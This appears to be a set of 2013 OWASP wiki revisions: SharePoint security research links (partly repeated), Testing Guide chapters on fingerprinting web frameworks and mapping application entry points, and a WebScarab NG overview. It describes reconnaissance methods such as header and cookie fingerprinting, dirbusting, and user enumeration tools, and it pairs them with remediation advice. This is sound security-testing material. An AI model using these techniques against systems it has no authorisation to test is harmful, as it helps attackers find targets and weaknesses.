* [http://www.darkreading.com/security/app-security/showArticle.jhtml?articleID=212903345 Microsoft SharePoint: A Weak Link In Enterprise Security?] - Dark Reading

==== Security related technical articles ====
* [http://www.sharepointsecurity.com/sharepoint/sharepoint-security/how-to-programmatically-disable-code-access-security/ How to Programmatically Disable Code Access Security]

== Published Security issues ==

=== SharePoint related vulnerabilities and its status ===
* {Note: Add MSRC case}
* http://milw0rm.com/exploits/8704 & http://milw0rm.com/sploits/2009-IIS-Advisory.pdf

== MOSS Security related WebParts, Tools & services ==

==== Open Source ====
* From CodePlex (see more on this search for [http://www.codeplex.com/site/search?ProjectSearchText=Sharepoint%20Security SharePoint Security]
** [http://securitytemplates.codeplex.com/ SharePoint Security Templates] (CodePlex)
** [http://spsecurity.codeplex.com/ SharePoint Security Configuration Feature]
** [http://accesschecker.codeplex.com Sharepoint Access Checker Web Part]
** [http://sitesecuritymgmt.codeplex.com/ Site Security Management Utility]
** [http://cryptocollaboration.codeplex.com/ CryptoCollaboration For SharePoint]

==== Commercially Supported ====
* [http://www.sharepointsecurity.com ARB Security Solutions (www.sharepointsecurity.com)]
* [http://www.surety.com/Offerings/AbsoluteProof/For-MS-SharePoint.aspx AbsoluteProof for MS SharePoint] - related article [http://www.cmswire.com/cms/enterprise-cms/surety-releases-absoluteproof-for-sharepoint-002471.php Surety Releases AbsoluteProof for SharePoint]
* [http://www.avepoint.com/assets/pdf/Social_Security_Administration_Case_Study.pdf Sharepoint case study (marketing doc)]

== Dangerous MOSS APIs ==

Map the security implications of MOSS APIs, for example:
* which APIs (if badly used)are vulnerable to: XSS, CSRF, SQL Injection
* configuration settings that have security implications

== SharePoint Hacking ==
==== SharePoint Hacking Tools ====
* [http://sparty.secniche.org/ Sparty] - MS Sharepoint and Frontpage Auditing Tool
* [https://github.com/toddsiegel/spscan SPScan] - SharePoint scanner and fingerprinter based on WPScan
* [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/ Stach & Liu's SharePoint Hacking Diggity Project] - SharePoint hacking tools project page. Currently includes such hacking tools as:
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20-%20GoogleDiggity%20Dictionary%20File SharePoint – GoogleDiggity Dictionary File] - New GoogleDiggity input dictionary file containing 118 queries that allow users to uncover SharePoint specific vulnerabilities exposed via the Google search engine. This dictionary helps assessors locate exposures of common SharePoint administrative pages, web services, and site galleries that an organization typically would not want to be made available to the public, let alone indexed by Google.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePointURLBrute SharePointURLBrute] - SharePointURLBrute is a new SharePoint hacking utility developed to help assessors quickly test user access to 99 common SharePoint administrative pages (e.g. “Add Users” page -> /_layouts/aclinv.aspx) by automating forceful browsing attacks.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20UserDispEnum SharePoint UserDispEnum] - UserDispEnum is a new SharePoint user enumeration tool that exploits insecure access controls to the /_layouts/UserDisp.aspx?ID=1 page. This utility cycles through the integer ID values from 1 onward to identify valid users, account names, and other related profile information that can be easily extracted from the SharePoint user profiles.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20DLP%20Tools SharePoint DLP Tools] - COMING SOON – Stach & Liu data loss prevention (DLP) tools for Microsoft SharePoint. SharePoint DLP Tools utilize administrative web services to help automate the searching of SharePoint files and lists for SSNs, credit card numbers, passwords, and other common information disclosures.

==== SharePoint Hacking Presentations ====
* '''2008'''
** [http://www.youtube.com/watch?v=DYudvh9cfZM hak5 - Episode 407 - Toorcon 2008: Robin Wood, Dan Griffin] - see 11:10 minute mark in video for interview with Dan Griffin about SharePoint Hacking.
* '''2013'''
** [http://www.youtube.com/watch?feature=player_embedded&v=AAObW2fcB_s TMI: Assessing and Exploiting SharePoint at DerbyCon 3.0]
** [https://media.blackhat.com/us-13/Arsenal/us-13-Sood-Sparty-Slides.pdf Sparty - Blackhat USA 2013] Sparty : A Frontpage and Sharepoint Auditing Tool

== WebParts Security ==

* Security ratings & mappings of MOSS Deployed Web Parts
* Security ratings & mappings of 3rd Part Web Parts

Research for SharePoint (MOSS)

2013-11-11T01:53:14Z

Glenn 'devalias' Grant: Added tool (Sparty) and presentations (2013-derbycon, blackhat)

This page contains research notes on Microsoft's SharePoint MOSS and WSS

== Resources==

==== Microsoft resources====
* [http://office.microsoft.com/download/afile.aspx?AssetID=AM102437421033 Security Architecture for SharePoint Products and Technologies] (Word Doc)
* [http://sharepoint.microsoft.com SharePoint Community Portal]
* [http://technet.microsoft.com/en-us/library/cc262619.aspx Downloadable book: Security for Office SharePoint Server 2007] - [http://go.microsoft.com/fwlink/?LinkID=94375 link to 277 page Doc file]
* [http://blogs.msdn.com/arpans/archive/2008/05/09/sharepoint-end-user-security.aspx SharePoint End User Security]

==== Other Resources and Documentation====
* [http://www.finalcandidate.com/en/tandp/Pages/SharePointSecurityConcepts.aspx SharePoint Security Concepts] - contains a number of other links to more material
* [http://blogs.gartner.com/neil_macdonald/2009/02/25/sharepoint-security-best-practices/ SharePoint Security Best Practices] - $995 Gartner report
* [http://sharepointmagazine.net/technical/administration/microsoft-office-sharepoint-server-2007-security-model Microsoft Office SharePoint Server 2007 Security Model]
* [http://www.cmswire.com/cms/enterprise-cms/sharepoint-security-concerns-simply-a-lack-of-governance-003551.php SharePoint Security Concerns Simply a Lack of Governance?]
* [http://www.cmswire.com/cms/enterprise-cms/governance-key-for-sharepoint-implementations-003123.php Governance Key for SharePoint Implementations]

==== Presentations ====
* HackCon 2011 - Oslo, Norway - February 16, 2011 : [http://www.stachliu.com/wp-content/uploads/2011/03/HackCon%202011%20-%20SharePoint%20Security%20-%20Feb2011.pdf SharePoint Security: Advanced SharePoint Security Tips and Tools]
* OWASP Houston Chapter - August 12, 2009 : [http://owasp.icrew.org/downloads/OWASP_ShohnTrojacek.pdf SharePoint Auditing and Penetration Testing] Presentation by: Shohn Trojacek
* from Denim group:
** [http://www.denimgroup.com/media/pdfs/DenimGroup_SecuringSharePoint_TASSCCTEC2009_20090326.pdf Securing SharePoint (PDF Format)] - TASSCC Technology Education Conference in Austin, March 26, 2009
** [http://www.denimgroup.com/media/pdfs/DenimGroup_SecuringSharePoint_TRISC_20090324.pdf Securing Sharepoint (PDF Format)] - Texas Regional Infrastructure Security Conference (TRISC) in Austin, March 24, 2009
** [http://sp.meetdux.com/archive/2009/07/08/a-primer-to-sharepoint-security.aspx A Primer to SharePoint Security] - video

==== Other interesting resources====
* [http://www.indeed.com.au/jobs?q=Moss+Security&l= MOSS Security jobs (in Australia)]
* [http://www.cmswire.com/news/topic/sharepoint Articles on CMSWire about SharePoint]

==== Other Blogs and Articles ====
* [http://www.darkreading.com/security/app-security/showArticle.jhtml?articleID=212903345 Microsoft SharePoint: A Weak Link In Enterprise Security?] - Dark Reading

==== Security related technical articles ====
* [http://www.sharepointsecurity.com/sharepoint/sharepoint-security/how-to-programmatically-disable-code-access-security/ How to Programmatically Disable Code Access Security]

== Published Security issues ==

=== SharePoint related vulnerabilities and its status ===
* {Note: Add MSRC case}
* http://milw0rm.com/exploits/8704 & http://milw0rm.com/sploits/2009-IIS-Advisory.pdf

== MOSS Security related WebParts, Tools & services ==

==== Open Source ====
* From CodePlex (see more on this search for [http://www.codeplex.com/site/search?ProjectSearchText=Sharepoint%20Security SharePoint Security]
** [http://securitytemplates.codeplex.com/ SharePoint Security Templates] (CodePlex)
** [http://spsecurity.codeplex.com/ SharePoint Security Configuration Feature]
** [http://accesschecker.codeplex.com Sharepoint Access Checker Web Part]
** [http://sitesecuritymgmt.codeplex.com/ Site Security Management Utility]
** [http://cryptocollaboration.codeplex.com/ CryptoCollaboration For SharePoint]

==== Commercially Supported ====
* [http://www.sharepointsecurity.com ARB Security Solutions (www.sharepointsecurity.com)]
* [http://www.surety.com/Offerings/AbsoluteProof/For-MS-SharePoint.aspx AbsoluteProof for MS SharePoint] - related article [http://www.cmswire.com/cms/enterprise-cms/surety-releases-absoluteproof-for-sharepoint-002471.php Surety Releases AbsoluteProof for SharePoint]
* [http://www.avepoint.com/assets/pdf/Social_Security_Administration_Case_Study.pdf Sharepoint case study (marketing doc)]

== Dangerous MOSS APIs ==

Map the security implications of MOSS APIs, for example:
* which APIs (if badly used)are vulnerable to: XSS, CSRF, SQL Injection
* configuration settings that have security implications

== SharePoint Hacking ==
==== SharePoint Hacking Tools ====
* [http://sparty.secniche.org/ Sparty - MS Sharepoint and Frontpage Auditing Tool]
* [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/ Stach & Liu's SharePoint Hacking Diggity Project] - SharePoint hacking tools project page. Currently includes such hacking tools as:
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20-%20GoogleDiggity%20Dictionary%20File SharePoint – GoogleDiggity Dictionary File] - New GoogleDiggity input dictionary file containing 118 queries that allow users to uncover SharePoint specific vulnerabilities exposed via the Google search engine. This dictionary helps assessors locate exposures of common SharePoint administrative pages, web services, and site galleries that an organization typically would not want to be made available to the public, let alone indexed by Google.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePointURLBrute SharePointURLBrute] - SharePointURLBrute is a new SharePoint hacking utility developed to help assessors quickly test user access to 99 common SharePoint administrative pages (e.g. “Add Users” page -> /_layouts/aclinv.aspx) by automating forceful browsing attacks.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20UserDispEnum SharePoint UserDispEnum] - UserDispEnum is a new SharePoint user enumeration tool that exploits insecure access controls to the /_layouts/UserDisp.aspx?ID=1 page. This utility cycles through the integer ID values from 1 onward to identify valid users, account names, and other related profile information that can be easily extracted from the SharePoint user profiles.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20DLP%20Tools SharePoint DLP Tools] - COMING SOON – Stach & Liu data loss prevention (DLP) tools for Microsoft SharePoint. SharePoint DLP Tools utilize administrative web services to help automate the searching of SharePoint files and lists for SSNs, credit card numbers, passwords, and other common information disclosures.

==== SharePoint Hacking Presentations ====
* '''2008'''
** [http://www.youtube.com/watch?v=DYudvh9cfZM hak5 - Episode 407 - Toorcon 2008: Robin Wood, Dan Griffin] - see 11:10 minute mark in video for interview with Dan Griffin about SharePoint Hacking.
* '''2013'''
** [http://www.youtube.com/watch?feature=player_embedded&v=AAObW2fcB_s TMI: Assessing and Exploiting SharePoint at DerbyCon 3.0]
** [https://media.blackhat.com/us-13/Arsenal/us-13-Sood-Sparty-Slides.pdf Sparty - Blackhat USA 2013] Sparty : A Frontpage and Sharepoint Auditing Tool

== WebParts Security ==

* Security ratings & mappings of MOSS Deployed Web Parts
* Security ratings & mappings of 3rd Part Web Parts

Fingerprint Web Application Framework (OTG-INFO-008)

2013-09-18T02:20:07Z

Glenn 'devalias' Grant: Fix Kali Linux naming, add link for 'wanted page'

{{Template:OWASP Testing Guide v4}}
== Summary ==
Web framework[*] fingerprinting is an important subtask of information gathering. Knowing type of framework can automatically give such a great advantage if such a framework has already been met by a penetration tester. It is not only known vulnerabilities in unpatched versions but specific misconfigurations and known file structure which makes it so important.

Several different vendors and versions of web frameworks are widely used.
Information about it significantly helps in the testing process, and will also change the course of the test.
Such information can be derived by careful analysis of certain common locations. Most of web frameworks have several markers in those locations, which help an attacker to spot them.
This is basically what all automatic tools do - looking for a marker from a predefined location
and then comparing it to the database of known signatures. For better accuracy several markers are usually used.

[*] Please note that in this article we make no difference between Web Application Frameworks (WAF) and Content Management Systems (CMS).
This implying is made intentionally due to convenience from the point of fingerprinting of describing both of them in one chapter. Also, borders between WAFs and CMSes sometimes can be quite fuzzy (e.g. for Drupal, Joomla, SilverStripe and others) Further we reference both of the categories as web frameworks.

== Test Objectives ==
To define type of used web framework so to have a better understanding of how to plan future attack.

== How to Test ==

=== Black Box testing ===
There are several most common locations to look in in order to define the current framework:
*HTTP headers
*Cookies
*HTML source code
*Specific files and folders

Let's look closer at those approaches.

==== HTTP headers ====
The most basic form of identifying a web framework is to look at the ''X-Powered-By'' field in the HTTP response header.
Many tools can be used to fingerprint a target. The simplest one is netcat utility.
Consider the following HTTP Request-Response:
<pre>
$ nc 127.0.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Sat, 07 Sep 2013 08:19:15 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
X-Powered-By: Mono
</pre>

From the ''X-Powered-By'' field, we understand that the web application framework is likely to be Mono.

However, although simplicity and quickness of such an approach, this methodology doesn't work in 100% of cases. It is possible to easily disable ''X-Powered-By'' header by a proper configuration. There are also several techniques that allow a web site to obfuscate HTTP headers (see an example in [[#Remediation]] chapter)
So in the same example we could either miss the ''X-Powered-By'' header or obtain an answer like the following:
<pre>
HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Sat, 07 Sep 2013 08:19:15 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
X-Powered-By: Blood, sweat and tears
</pre>

Sometimes there are more HTTP-headers which point at the certain web framework. In the following example according to the information from HTTP-request one can see that ''X-Powered-By'' header contains PHP version. However, ''X-Generator'' header points out the used framework is actually Swiftlet, which helps a penetration tester to expand his attack vectors. When performing fingerprinting, always carefully inspect every HTTP-header for such leaks.
<pre>
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 07 Sep 2013 09:22:52 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.16-1~dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Generator: Swiftlet
</pre>

==== Cookies ====
Another similar and somehow more reliable way to determine the current web framework, are framework-specific cookies.
Consider the following HTTP-request:

[[Image:Cakephp_cookie.png]]

As we can see, cookie ''CAKEPHP'' has automatically been set, which gives us information about what framework is used. List of common cookies names is presented in chapter [[#Cookies_2]]. Limitations are the same - it is possible to change the name of the cookie. For example, for the selected ''CakePHP'' framework this could be done by the following configuration (excerpt from core.php):

<pre>
/**
* The name of CakePHP's session cookie.
*
* Note the guidelines for Session names states: "The session name references
* the session id in cookies and URLs. It should contain only alphanumeric
* characters."
* @link http://php.net/session_name
*/
Configure::write('Session.cookie', 'CAKEPHP');
</pre>

However from the experience, these changes are less likely to be made than, for example, ''X-Powered-By'' header so this approach can be considered as more reliable one.

==== HTML source code ====
This technique is based on finding certain patterns in the HTML page source code. Often one can find much information which helps a tester to recognize specific web framework.
Ones of the common markers are HTML comments which directly lead to a framework disclosure. More often certain framework-specific paths can be found, i.e. links to framework-specific css and/or js folders. Finally, specific script variables might also point on a certain framework.
From the screenshot below one can easily learn the used framework and its version by the mentioned markers: comment, specific paths and script variables can all help an attacker to quickly determine an instance of ZK framework.

[[Image:Zk_html_source.png]]

The most frequently such information is placed either between <head></head> and in <meta> tags or in the end of the page. Nevertheless, it is recommended to check the whole document - it can be useful for other purposes (such as inspection of other useful comments and hidden fields)
Sometimes, however, web developers don't care much about hiding tracks of a framework. It's still possible to stumble upon something like that at the bottom of the page:

[[Image:banshee_bottom_page.png]]

==== Specific files and folders ====
Apart from information, gathered from HTML sources, there is another approach which greatly helps an attacker to determine the framework with high accuracy.
Every framework has its own specific file and folder structure on the server. We pointed out that one can see the specific path from the HTML page source but sometimes they are not explicitly presented there and still reside on the server. In order to uncover them such technique as dirbusting is used. Dirbusting essense is fuzzing target with predictable folder- and filenames and monitoring HTTP-responses thus enumerating server contents. This information can be used both for finding default files and attacking them in next stages and for fingerprinting the web framework.
Dirbusting can be done in several ways, example below shows successful dirbusting attack against a WordPress-powered target with the help of defined list and Intruder functionality of Burp Suite.

[[Image:Wordpress_dirbusting.png]]

We can see that for some WordPress-specific folders (for instance, /wp-includes/, /wp-admin/ and /wp-content/) HTTP-reponses are 403 (Forbidden), 302 (Found, redirection to ''wp-login.php'') and 200 (OK) respectively. This is a good indicator that the target is WordPress-powered. The same way it is possible to dirbust different framework plugin folders and their versions. On a screenshot below one can see a typical CHANGELOG file of a Drupal plugin, which both points out on the used framework and discloses vulnerable plugin version.

[[Image:Drupal_botcha_disclosure.png]]

Tip: before starting dirbusting (which is a useful operation anyway), it is recommended to check robots.txt file first. Sometimes framework specific folders and other sensitive information can be found there as well! Example of such robots file is presented on a screenshot below.

[[Image:Robots-info-disclosure.png]]

=== Gray Box testing ===
Please address yourself to watching Monty Python's Flying Circus, I'm sure you'll like it!

== Common frameworks ==
=== Cookies ===

{| class="wikitable"
|-
! Framework !! Cookie name
|-
| Zope || zope3
|-
| CakePHP || cakephp
|-
| Kohana || kohanasession
|-
| Laravel || laravel_session
|-
| 1C-Bitrix || BITRIX_
|-
| AMPcms || AMP
|-
|-
| Django CMS || django
|-
| DotNetNuke || DotNetNukeAnonymous
|-
| e107 || e107_tz
|-
| EPiServer || EPiTrace, EPiServer
|-
| Graffiti CMS || graffitibot
|-
| Hotaru CMS || hotaru_mobile
|-
| ImpressCMS || ICMSession
|-
| Indico || MAKACSESSION
|-
| InstantCMS || InstantCMS[logdate]
|-
| Kentico CMS || CMSPreferredCulture
|-
| MODx || SN4[12symb]
|-
| TYPO3 || fe_typo_user
|-
| Dynamicweb || Dynamicweb
|-
| LEPTON || lep[some_numeric_value]+sessionid
|-
| Wix || Domain=.wix.com
|-
| VIVVO || VivvoSessionId
|}

=== HTML source code ===
==== General markers ====
{| class="wikitable"
|-
| %framework_name%
|-
| powered by
|-
| built upon
|-
| running
|}

==== Specific markers ====
{| class="wikitable"
|-
! Framework !! Keyword
|-
| Adobe ColdFusion || 
|-
| Indexhibit || ndxz-studio
|}

=== Specific files and folders ===
Different for each specific framework. It is recommended to install the corresponding framework during penetration tests in order to have better understanding of what infrastructure is presented and which files might be left on the server. However, several good pre-made lists already exist, one good example of them - FuzzDB wordlists of predictable files/folders (http://code.google.com/p/fuzzdb/)

== Tools ==
A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-based fingerprinting tools.

=== WhatWeb ===
Website: http://www.morningstarsecurity.com/research/whatweb <br>
Currently one of the best fingerprinting tools on the market. Included in a default [[Kali Linux]] build.
Language: Ruby
Matches for fingerprinting are made with:
* Text strings (case sensitive)
* Regular expressions
* Google Hack Database queries (limited set of keywords)
* MD5 hashes
* URL recognition
* HTML tag patterns
* Custom ruby code for passive and aggressive operations

Sample output is presented on a screenshot below:

[[Image:whatweb-sample.png]]

=== BlindElephant ===
Website: https://community.qualys.com/community/blindelephant <br>
This great tool works on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting.
Language: Python

Sample output of a successful fingerprint:
<pre>
pentester$ python BlindElephant.py http://my_target drupal
Loaded /Library/Python/2.7/site-packages/blindelephant/dbs/drupal.pkl with 145 versions, 478 differentiating paths, and 434 version groups.
Starting BlindElephant fingerprint for version of drupal at http://my_target

Hit http://my_target/CHANGELOG.txt
File produced no match. Error: Retrieved file doesn't match known fingerprint. 527b085a3717bd691d47713dff74acf4

Hit http://my_target/INSTALL.txt
File produced no match. Error: Retrieved file doesn't match known fingerprint. 14dfc133e4101be6f0ef5c64566da4a4

Hit http://my_target/misc/drupal.js
Possible versions based on result: 7.12, 7.13, 7.14

Hit http://my_target/MAINTAINERS.txt
File produced no match. Error: Retrieved file doesn't match known fingerprint. 36b740941a19912f3fdbfcca7caa08ca

Hit http://my_target/themes/garland/style.css
Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13, 7.14

...

Fingerprinting resulted in:
7.14

Best Guess: 7.14
</pre>

=== Wappalyzer ===
Website: http://wappalyzer.com <br>
Wapplyzer is a Firefox/Chrome plug-in. It works on only regular expression matching and doesn't need anything other than the page to be loaded on browser. It works completely at the browser level and give results in form of icons. Although sometimes it has false positives, this is very handy to have notion of what technologies were used to construct a target website immediately after browsing a page.
Sample output of a plug-in is presented on a screenshot below.

[[Image:Owasp-wappalyzer.png]]

== Vulnerability References ==
'''Whitepapers'''<br>
* Saumil Shah: "An Introduction to HTTP fingerprinting" - http://www.net-square.com/httprint_paper.html
* Anant Shrivastava : "Web Application Finger Printing" - http://anantshri.info/articles/web_app_finger_printing.html

== Remediation ==
General advice: use several tools described above and check scan logs in order to better understand what exactly helps an attacker to disclose your web framework. By performing multiple scans after changes you've done to hide framework tracks, it's possible to achieve better security level and to make sure of undetectability by automatic scans.
Below you may find specific recommendations by framework marker location and some additional interesting approaches.

==== HTTP headers ====
Check your configuration and disable/obfuscate all HTTP-headers which disclose information about used technologies.
An interesting article about HTTP-headers obfuscation using Netscaler:
http://grahamhosking.blogspot.ru/2013/07/obfuscating-http-header-using-netscaler.html

==== Cookies ====
It is recommended to change cookie names by making proper changes in corresponding config files.

==== HTML source code ====
Check manually the contents of your HTML code and remove everything what explicitly points to the framework.
General guidelines:
*Make sure you didn't leave any visual markers disclosing used framework
*Remove any unnecessary comments (copyrights, bug information, specific framework comments)
*Remove META and generator tags
*Use your own css/js and do not store those in a framework-specific folders
*Make sure you're not using default scripts on the page; if using them is needed, obfuscate them.

==== Specific files and folders ====
*Remove any unnecessary/unused files on the server. This implies text files disclosing information about versions and installation too.
*Restrict access to other files in order to achieve 404-response when accessing them from outside. This can be done, for example, by modifying htaccess file and adding RewriteCond / RewriteRule there. Example of such restriction for two common WordPress folders is presented below.
<pre>
RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR]
RewriteCond %{REQUEST_URI} /wp-admin/$
RewriteRule $ /http://your_website [R=404,L]
</pre>
However, these are not the only ways to restrict access. In order to automate this process, certain framework-specific plugins exist. One example for WordPress is StealthLogin (http://wordpress.org/plugins/stealth-login-page)

==== Additional approaches ====
*Checksum management
*:Purpose of this approach is to beat checksum-based scanners and don't let them to disclose files by their hashes. Generally, there are two approaches in checksum management:
*:*Change the location of where those files are placed (i.e. move them to another folder, or rename existing)
*:*Modify their contents - even slight modification results in a completely different hash sum, so adding a single byte in the end of the file should not be a big problem.
*Controlled chaos
*:A funny and effective method which essense is adding bogus files and folders from other frameworks in order to fool scanners and confuse an attacker. But be careful not to overwrite exisiting files and folders and to break the current framework!

Identify application entry points (OTG-INFO-006)

2013-09-18T01:59:23Z

Glenn 'devalias' Grant: Added link to WebScarab

{{Template:OWASP Testing Guide v4}}

== Summary ==
Enumerating the application and its attack surface is a key precursor before any thorough testing can be undertaken, as it allows the tester to identify likely areas of weakness. This section aims to help identify and map out areas within the application that should be investigated once enumeration and mapping have been completed.

== Test Objectives ==

Understand how requests are formed and typical responses from the application

== How to Test ==

Before any testing begins, always get a good understanding of the application and how the user/browser communicates with it. As you walk through the application, pay special attention to all HTTP requests (GET and POST Methods, also known as Verbs), as well as every parameter and form field that is passed to the application. In addition, pay attention to when GET requests are used and when POST requests are used to pass parameters to the application. It is very common that GET requests are used, but when sensitive information is passed, it is often done within the body of a POST request. Note that to see the parameters sent in a POST request, you will need to use a tool such as an intercepting proxy (for example, [[OWASP WebScarab Project|OWASP's WebScarab]]) or a browser plug-in. Within the POST request, also make special note of any hidden form fields that are being passed to the application, as these usually contain sensitive information, such as state information, quantity of items, the price of items, that the developer never intended for you to see or change.

In the author's experience, it has been very useful to use an intercepting proxy and a spreadsheet for this stage of the testing. The proxy will keep track of every request and response between you and the application as you walk through it. Additionally, at this point, testers usually trap every request and response so that they can see exactly every header, parameter, etc. that is being passed to the application and what is being returned. This can be quite tedious at times, especially on large interactive sites (think of a banking application). However, experience will teach you what to look for, and, therefore, this phase can be significantly reduced. As you walk through the application, take note of any interesting parameters in the URL, custom headers, or body of the requests/responses, and save them in your spreadsheet. The spreadsheet should include the page you requested (it might be good to also add the request number from the proxy, for future reference), the interesting parameters, the type of request (POST/GET), if access is authenticated/unauthenticated, if SSL is used, if it's part of a multi-step process, and any other relevant notes. Once you have every area of the application mapped out, then you can go through the application and test each of the areas that you have identified and make notes for what worked and what didn't work. The rest of this guide will identify how to test each of these areas of interest, but this section must be undertaken before any of the actual testing can commence.

Below are some points of interests for all requests and responses. Within the requests section, focus on the GET and POST methods, as these appear the majority of the requests. Note that other methods, such as PUT and DELETE, can be used. Often, these more rare requests, if allowed, can expose vulnerabilities. There is a special section in this guide dedicated for testing these HTTP methods.

'''Requests:'''
* Identify where GETs are used and where POSTs are used.
* Identify all parameters used in a POST request (these are in the body of the request).
* Within the POST request, pay special attention to any hidden parameters. When a POST is sent all the form fields (including hidden parameters) will be sent in the body of the HTTP message to the application. These typically aren't seen unless you are using a proxy or view the HTML source code. In addition, the next page you see, its data, and your access can all be different depending on the value of the hidden parameter(s).
* Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark).
* Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string such as separated by a &, ~, :, or any other special character or encoding.
* A special note when it comes to identifying multiple parameters in one string or within a POST request is that some or all of the parameters will be needed to execute your attacks. You need to identify all of the parameters (even if encoded or encrypted) and identify which ones are processed by the application. Later sections of the guide will identify how to test these parameters. At this point, just make sure you identify each one of them.
* Also pay attention to any additional or custom type headers not typically seen (such as debug=False).

'''Responses:'''
*Identify where new cookies are set (Set-Cookie header), modified, or added to.
*Identify where there are any redirects (300 HTTP status code), 400 status codes, in particular 403 Forbidden, and 500 internal server errors during normal responses (i.e., unmodified requests).
*Also note where any interesting headers are used. For example, "Server: BIG-IP" indicates that the site is load balanced. Thus, if a site is load balanced and one server is incorrectly configured, then you might have to make multiple requests to access the vulnerable server, depending on the type of load balancing used.

=== Black Box testing and example ===
'''Testing for application entry points:''' <br>
The following are two examples on how to check for application entry points.<br>

====EXAMPLE 1====
This example shows a GET request that would purchase an item from an online shopping application.

GET https://x.x.x.x/shoppingApp/buyme.asp?CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x
Host: x.x.x.x
Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy

'''Result Expected:'''

Here you would note all the parameters of the request such as CUSTOMERID, ITEM, PRICE, IP, and the Cookie (which could just be encoded parameters or used for session state).

====EXAMPLE 2====
This example shows a POST request that would log you into an application.

POST https://x.x.x.x/KevinNotSoGoodApp/authenticate.asp?service=login
Host: x.x.x.x
Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMTIzNA==
CustomCookie=00my00trusted00ip00is00x.x.x.x00

Body of the POST message:

user=admin&pass=pass123&debug=true&fromtrustIP=true

'''Result Expected:'''

In this example you would note all the parameters as you have before but notice that the parameters are passed in the body of the message and not in the URL. Additionally, note that there is a custom cookie that is being used.

=== Gray Box testing and example ===

Testing for application entry points via a Gray Box methodology would consist of everything already identified above with one caveat. This would be if there are any external sources from which the application receives data and processes it (such as SNMP traps, syslog messages, SMTP, or SOAP messages from other servers). If there are any external sources of input into the application then a meeting with the application developers could identify any functions that would accept or expect user input and how it's formatted. For example, the developer could help in understanding how to formulate a correct SOAP request that the application would accept and where the web service resides (if the web service or any other function hasn't already been identified during the black box testing).

== Tools ==

'''Intercepting Proxy:'''<br>

*OWASP: [[OWASP WebScarab Project|Webscarab]]
*OWASP: [[OWASP_Zed_Attack_Proxy_Project| Zed Attack Proxy (ZAP)]]
*Dafydd Stuttard: Burp proxy -
http://portswigger.net/burp/proxy.html

'''Browser Plug-in:'''<br>

*"TamperIE" for Internet Explorer -
http://www.bayden.com/TamperIE/
*Adam Judson: "Tamper Data" for Firefox -
https://addons.mozilla.org/en-US/firefox/addon/966

== References ==

'''Whitepapers'''<br>

*RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 -
http://tools.ietf.org/html/rfc2616

OWASP WebScarab NG Project

2013-09-18T01:56:23Z

Glenn 'devalias' Grant: Added 'OWASP Breakers' tag

{{OWASP Breakers}}
==== Main ====

{{:OWASP_WebScarab_NG_Project_Summary}}

==New User Interface==

As mentioned above, the user interface has changed quite a lot from the old WebScarab. Apart from the new default Look&Feel (JGoodies), you will see that the conversation viewer has changed quite a lot. The old "Raw" view is still there, but the Parsed version has changed quite dramatically - for the better, I hope you'll agree!

The Parsed view now shows the request and response details in a tree form, rather than in individual text boxes. This makes the interface look a lot cleaner, and more importantly, is a lot more compact. It also makes it a lot easier to include features like automatically breaking out URL parameters, and multiple cookies into their own nodes, where it is a lot easier to view the individual parameters. We also show the request and the response next to each other, rather than one above the other, since most people seem to have more horizontal real-estate than vertical. The split between request and response can easily be adjusted by dragging, as can the split between the headers and the message content.

[[Image:WebScarab-NG-default.png]]

==Current status==

At this stage, WebScarab-NG primary feature is the intercepting proxy that allows the operator to observe and modify requests from a browser or other client passing through the proxy. A new feature is the Proxy Control Bar, which is implemented as a "stays on top" tool bar that floats above your browser or other thick client, and allows you to quickly enable or disable request intercepts. It also allows you to annotate or describe the requests as they pass through the proxy. If you type some text into the annotation field, that text will be linked to the next conversation that passes through the proxy, and can later be viewed as part of the conversation history. this can be very helpful to keep track of what you were doing in a multi-step procedure.

For example: Selecting a menu item, entering a value, submitting that value, etc. Often sites are built in such a way that they can result in dozens of conversations resulting from a single action. Annotating that conversation that initiated all the rest makes it very easy to identify them at a later stage.

[[Image:WebScarab-NG-proxy-control-bar.png]]

==Error feedback==

One of the neat features provided by the Spring Rich Client Platform is the ability to check that the inputs actually make sense, and to provide automated "as you type" feedback to the user.

For example, look at the "Intercept Request" window:

[[Image:WebScarab-NG-intercept-request-error.png]]

